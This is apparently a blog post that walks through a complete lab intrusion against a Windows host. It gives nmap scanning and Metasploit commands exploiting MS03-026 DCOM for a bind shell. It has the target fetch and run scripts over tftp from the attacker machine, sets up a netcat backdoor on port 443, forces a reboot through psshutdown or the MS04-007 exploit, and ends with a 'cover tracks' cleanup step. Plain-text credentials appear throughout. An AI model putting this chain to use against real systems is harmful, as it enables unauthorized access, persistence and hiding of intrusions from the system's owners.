TEST-XP2 = 131.107.1.222
DEN-WEB2 = 131.107.1.254
Step 1: Information Gathering (Scanning)
Scan Target with Nmap:
nmap -A 131.107.1.254
Step 2: Vulnerability Identification
Use Google search to find vulnerabilities on 131.107.1.254, based on the result of Step 1.
Example: MS03-026 (MS-RPC DCOM Vulnerability) or Scan with Nessus vulnerability scanner.
Step 3: Gain Access/Exploitation
>> Metasploit 2.x
msf > use msrpc_dcom_ms03_026
msf > set PAYLOAD win32_bind
msf > set RHOST 131.107.1.254
msf > set LPORT 5555
msf > exploit
>> Metasploit 3.x
msf > use windows/dcerpc/ms03_026_dcom
msf > set PAYLOAD windows/shell/bind_tcp
msf > set RHOST 131.107.1.254
msf > set LPORT 5555
msf > exploit
Step 4: Maintain Access
Ensure that you have launched the TFTPD32 (tftp server).
Upload all necessary scripts...
C:\WINDOWS\System32>tftp -i 131.107.1.222 GET start.cmd
C:\WINDOWS\System32>tftp -i 131.107.1.222 GET cleanup.cmd
Run the script...
C:\WINDOWS\System32>start.cmd
On TEST-XP2 machine, do the following:
Connect via Remote Desktop ...
User: myadmin
Password: P@ssw0rd
Open a new command prompt.
Launch Netcat to connect to the open port 443 on the remote machine...
Z:\Tools\NC>nc -v 131.107.1.254 443
Open another new command prompt.
Force the Target machine to reboot ...
Option 1: PSShutdown
Z:\Tools\SysinternalsSuite>psshutdown -r -f -u myadmin -p P@ssw0rd \\131.107.1.254
Option 2: Metasploit module
msf > use msasn1_ms04_007_killbill
msf > set PAYLOAD win32_bind
msf > set RHOST 131.107.1.254
msf > exploit
After rebooted, log on to DEN-WEB2 machine with:
User: administrator
Password: P@ssw0rd
Switch to TEST-XP2 machine.
You should see your Netcat get connected.
Now you can connect to the Target machine at anytime.
If not, re-run the command:
Z:\Tools\NC>nc -v 131.107.1.254 443
Step 5: Cover Tracks/Housekeeping
Switch to the Netcat opened command prompt.
Run the housekeeping script...
C:\WINDOWS\System32>cleanup.cmd
No comments:
Post a Comment